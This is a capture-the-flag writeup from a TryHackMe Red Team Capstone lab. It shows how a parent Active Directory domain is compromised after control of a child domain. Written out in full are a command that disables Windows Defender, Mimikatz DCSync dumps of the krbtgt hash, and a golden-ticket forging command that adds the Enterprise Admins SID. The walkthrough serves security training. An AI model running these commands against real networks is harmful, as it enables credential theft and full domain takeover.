☕
Writeups
TryHackMeHackTheBoxReferralsDonateLinkedIn
  • Writeups
  • TryHackme
    • 2025
      • Hackfinity Battle Vault
      • Security Footage
      • Ledger
      • Moebius
      • Mayhem
      • Robots
      • Billing
      • Crypto Failures
      • Rabbit Store
      • Decryptify
      • You Got Mail
      • Smol
      • Light
      • Lo-Fi
      • Silver Platter
    • 2024
      • Advent of Cyber '24 Side Quest
        • T1: Operation Tiny Frostbite
        • T2: Yin and Yang
        • T3: Escaping the Blizzard
        • T4: Krampus Festival
        • T5: An Avalanche of Web Apps
      • The Sticker Shop
      • Lookup
      • Mouse Trap
      • Hack Back
      • SeeTwo
      • Whiterose
      • Rabbit Hole
      • Mountaineer
      • Extracted
      • Backtrack
      • Brains
      • Pyrat
      • K2
        • Base Camp
        • Middle Camp
        • The Summit
      • The London Bridge
      • Cheese CTF
      • Breakme
      • CERTain Doom
      • TryPwnMe One
      • Hammer
      • U.A. High School
      • IronShade
      • Block
      • Injectics
      • DX2: Hell's Kitchen
      • New York Flankees
      • NanoCherryCTF
      • Publisher
      • W1seGuy
      • mKingdom
      • Airplane
      • Include
      • CyberLens
      • Profiles
      • Whats Your Name?
      • Capture Returns
      • TryHack3M
        • TryHack3M: Burg3r Bytes
        • TryHack3M: Bricks Heist
        • TryHack3M: Sch3Ma D3Mon
        • TryHack3M: Subscribe
      • Creative
      • Bypass
      • Clocky
      • El Bandito
      • Hack Smarter Security
      • Summit
      • Chrome
      • Exfilibur
      • Breaking RSA
      • Kitty
      • Reset
      • Umbrella
      • WhyHackMe
      • Dodge
    • 2023
      • Advent of Cyber '23 Side Quest
        • The Return of the Yeti
        • Snowy ARMageddon
        • Frosteau Busy with Vim
        • The Bandit Surfer
      • Stealth
      • AVenger
      • Dreaming
      • DockMagic
      • Hijack
      • Bandit
      • Compiled
      • Super Secret TIp
      • Athena
      • Mother's Secret
      • Expose
      • Lesson learned?
      • Grep
      • Crylo
      • Forgotten Implant
      • Red
    • Obscure
    • Capture
    • Prioritise
    • Weasel
    • Valley
    • Race Conditions
    • Intranet
    • Flip
    • Cat Pictures 2
    • Red Team Capstone Challenge
      • OSINT
      • Perimeter Breach
      • Initial Compromise of Active Directory
      • Full Compromise of CORP Domain
      • Full Compromise of Parent Domain
      • Full Compromise of BANK Domain
      • Compromise of SWIFT and Payment Transfer
  • HackTheBox
    • 2025
      • Certified
    • 2024
      • BoardLight
      • Crafty
      • Devvortex
      • Surveillance
      • Codify
      • Manager
      • Drive
      • Zipping
    • 2023
      • Topology
Powered by GitBook
On this page
  • Used Tools
  • Summary
  • Investigation
  • Flag-15: Foothold on Parent Domain
  • Flag-16: Administrative access to Parent Domain

Was this helpful?

  1. TryHackme
  2. Red Team Capstone Challenge

Full Compromise of Parent Domain

PreviousFull Compromise of CORP DomainNextFull Compromise of BANK Domain

Last updated 2 years ago

Was this helpful?

Used Tools

python webserver

powershell

mimikatz

Summary

From our attack machine and VPN server, we will start a web server to provide mimikatz and other tools to the corpdc domain controller used to compromise the parent domain. First, we deactivate the AV, and we unsuccessfully try to retrieve the Administrator hash from the rootdc running lsadump::dcsync with our Domain Admin user in Mimikatz. From there, we gather all the necessary information to craft a golden ticket to impersonate the Administrator and do it so. With the impersonated administrator, we are able to access the directories of rootdc and are able to retrieve the flags for fully compromising the parent domain. The next step is to create a user on rootdc with the tools PsExec and SMBExec, but will be discussed in the next section.

Investigation

Running a python webserver on the attack machine to provide the tools to the network.

Downloading the tools to the VPN machine.

Running a Python webserver on the VPN machine to provide the corpdc with the tools we need.

First, we run a PowerShell as administrator on the corpdc and disable AV with the following command and get Mimikatz from the VPN server.

set-mppreference -disablerealtimemonitoring $true

Next, we run mimikatz, check our privileges and try to dump the hashes of the local administrator of the rootdc. But we’ll get an error, that the username is not unique which is clear, because there are multiple local administrators

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator

To get a unique identifier of the local administrator of the rootdc machine, we get the SID of the Administrator from the rootdc to repeat the process of dumping the credentials of the local administrator of the rootdc.

Again we get an error and are not able to retrieve the hash.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500

After the many failed attempts we craft a golden ticket to impersonate the administrator to get any further.

For this, the following information has to be gathered to craft a golden ticket.

  • The FQDN of the domain

    • corp.thereserve.loc

  • The SID of the child domain controller (CORPDC), which we will impersonate in our forged TGT

    • S-1-5-21-170228521-1485475711-3199862024-1009

    Get SID of CORPDC

    PS C:\Windows\system32> Get-ADComputer -Identity "CORPDC"
  • The SID of the Enterprise Admins in the parent domain, which we will add as an extra SID to our forged TGT

    • S-1-5-21-1255581842-1300659601-3764024703-519

    Get SID of ROOTDC

    PS C:\Windows\system32> Get-ADGroup -Identity "Enterprise Admins" -Server rootdc.thereserve.loc
  • The username of the account we want to impersonate

    • Administrator

  • The KRBTGT password hash

    • 0c757a3445acb94a654554f3ac529ede

    mimikatz # lsadump::dcsync /user:corp\krbtgt
# From https://tryhackme.com/room/exploitingad
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt

With that information, we are able to craft a golden ticket and impersonate the administrator.

kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt

From there we are able to reach the directories of rootdc.

And place our proof of compromises in the given folders. The next section includes creating a new user on rootdc and adding this to the Domain Admins and Enterprise Admins, which would be part of this section, but for a clear structure and being part of compromising the BANK domain its discussed there.

Flag-15: Foothold on Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-16: Administrative access to Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Users\Administrator\0xb0b.txt

See also Exploiting Domain Trust

https://tryhackme.com/room/exploitingad